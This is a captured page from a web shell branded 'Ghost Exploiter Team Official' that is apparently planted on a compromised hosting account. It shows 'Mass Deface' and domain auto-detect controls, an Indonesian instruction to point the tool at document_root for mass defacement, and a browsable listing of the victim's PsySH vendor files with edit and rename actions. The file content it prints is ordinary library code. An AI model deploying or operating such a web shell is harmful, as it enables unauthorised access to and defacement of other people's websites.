webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
psy
/
psysh
/
src
/
Formatter
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CodeFormatter.php
9.756KB
edt
ren
DocblockFormatter.php
4.547KB
edt
ren
ReflectorFormatter.php
0.424KB
edt
ren
SignatureFormatter.php
11.169KB
edt
ren
TraceFormatter.php
3.274KB
edt
ren
<?php /* * This file is part of Psy Shell. * * (c) 2012-2023 Justin Hileman * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Psy\Formatter; /** * Reflector formatter interface. */ interface ReflectorFormatter { /** * @param \Reflector $reflector */ public static function format(\Reflector $reflector): string; }